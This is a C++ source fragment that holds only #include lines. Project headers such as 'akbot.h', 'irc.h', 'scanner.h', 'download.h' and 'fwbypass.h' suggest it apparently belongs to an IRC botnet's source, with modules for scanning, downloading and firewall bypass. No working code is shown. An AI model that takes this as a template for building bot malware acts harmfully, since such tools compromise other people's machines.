#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <winsock2.h>
#include <windows.h>
#include <shellapi.h>
#include <wininet.h>
#include <process.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <malloc.h>
#include <winsock2.h>
#include <windows.h>
#include <wininet.h>
#include <windns.h>
#include <Urlmon.h>
#include <iphlpapi.h>
#include <lm.h>
#include <lmat.h>
#include <io.h>
#include <fcntl.h>
#include <tchar.h>
#include <tlhelp32.h>
#include <assert.h>
#include <sqlext.h>
#include <vfw.h>
#include <shlobj.h>
#include <ntsecapi.h>
#include "akbot.h"
#include "asn.h"
#include "dnssrv.h"
#include "download.h"
#include "ftpd.h"
#include "ip.h"
#include "irc.h"
#include "netapi.h"
#include "process.h"
#include "scanner.h"
#include "thread.h"
#include "httpd.h"
#include <windows.h> 
#include <stdio.h> 
#include <fstream> 
#include <iostream> 
#include "fwbypass.h"
